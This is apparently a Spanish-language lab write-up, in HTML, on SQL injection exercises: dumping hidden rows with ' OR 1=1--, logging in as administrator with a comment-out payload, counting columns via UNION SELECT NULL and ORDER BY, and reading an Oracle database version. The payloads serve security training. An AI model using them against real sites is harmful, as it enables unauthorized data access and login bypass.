I"<h4 id="1-obtener-datos-ocultos">1. Obtener datos ocultos:</h4>

<p>​	Si queremos mostrar los datos ocultos de la siguiente pagina web.</p>

<p><img src="/assets/img/lab-1-1.png" alt="lab-1-1" /></p>

<p><br /></p>

<p>Simplemente añadiendo en la URL <code>'+OR+1=1--</code> nos mostraria todos los datos ocultos.</p>

<p><img src="/assets/img/lab-1-2.png" alt="lab-1-2" /></p>

<p><br /></p>

<p><img src="/assets/img/lab-1-3.png" alt="lab-1-3" /></p>

<p><br /></p>

<h4 id="2-subvertir-la-funcionalidad-de-la-pagina-web">2. Subvertir la funcionalidad de la pagina web</h4>

<p>Sabiendo un nombre de usuario se puede intentar iniciar sesión sin saber la contraseña, para ello en este caso el usuario seria <code class="language-plaintext highlighter-rouge">"administrator"</code> y le añadimos <code class="language-plaintext highlighter-rouge">'--</code> podriamos iniciar sesion (<code class="language-plaintext highlighter-rouge">administrator'--</code>).</p>

<p><img src="/assets/img/lab-2-1.png" alt="lab-2-1" /></p>

<p><br /></p>

<p><img src="/assets/img/lab-2-2.png" alt="lab-2-2" /></p>

<p><br /></p>

<p><img src="/assets/img/lab-2-3.png" alt="lab-2-3" /></p>

<p><br /></p>

<h4 id="3-determinar-el-numero-de-columnas">3. Determinar el numero de columnas</h4>

<p>​	Si queremos determinar el numero de columnas de una tabla se puede hacer añadiendo en la URL <code>'+UNION+SELECT+NULL--</code> añadiendo tantos <code class="language-plaintext highlighter-rouge">NULL</code> como columnas hay.</p>

<p><img src="/assets/img/lab-3-1.png" alt="lab-3-1" /></p>

<p><br /><img src="/assets/img/lab-3-2.png" alt="lab-3-2" /></p>

<p><br /></p>

<p><img src="/assets/img/lab-3-3.png" alt="lab-3-3" /></p>

<p><br /><img src="/../../Escritorio/lab-inje-sql/lab-3-5.png" alt="lab-3-5" /></p>

<p><br /></p>

<p>​	O tambien se puede utilizando <code>'+ORDER+BY+3--</code> incrementando el numero/disminuyedo segun la columnas que tenga.</p>

<p><img src="/assets/img/lab-3-4.png" alt="lab-3-4" /></p>

<p><br /><img src="/assets/img/lab-3-5-1619957790032.png" alt="lab-3-5" /></p>

<p><br /></p>

<h4 id="4-determinar-el-tipo-y-la-version">4. Determinar el tipo y la version</h4>

<p>Para que nos muestre la version de la base de datos primero determinamos determinamos el número de columnas y si contienen texto.</p>

<p><img src="/assets/img/lab-4-1.png" alt="lab-4-1" /></p>

<p>Para ello añadimos la siguiente inyección en la URL <code class="language-plaintext highlighter-rouge">'+UNION+SELECT+'abc','def'+FROM+dual--</code></p>

<p><img src="/assets/img/lab-4-2.png" alt="lab-4-2" /></p>

<p><br /></p>

<p><img src="/assets/img/lab-4-3.png" alt="lab-4-3" /></p>

<p><br /></p>

<p>Ya sabiendo esto usamos esta peticion a la base de datos <code>'+UNION+SELECT+BANNER,+NULL+FROM+v$version--</code> para que nos devuelva la versión</p>

<p><img src="/assets/img/lab-4-4.png" alt="lab-4-4" /></p>

<p><br /></p>

<p><img src="/assets/img/lab-4-5.png" alt="lab-4-5" /></p>

<p><br /></p>

<p><img src="/assets/img/lab-4-6.png" alt="lab-4-6" /></p>
:ET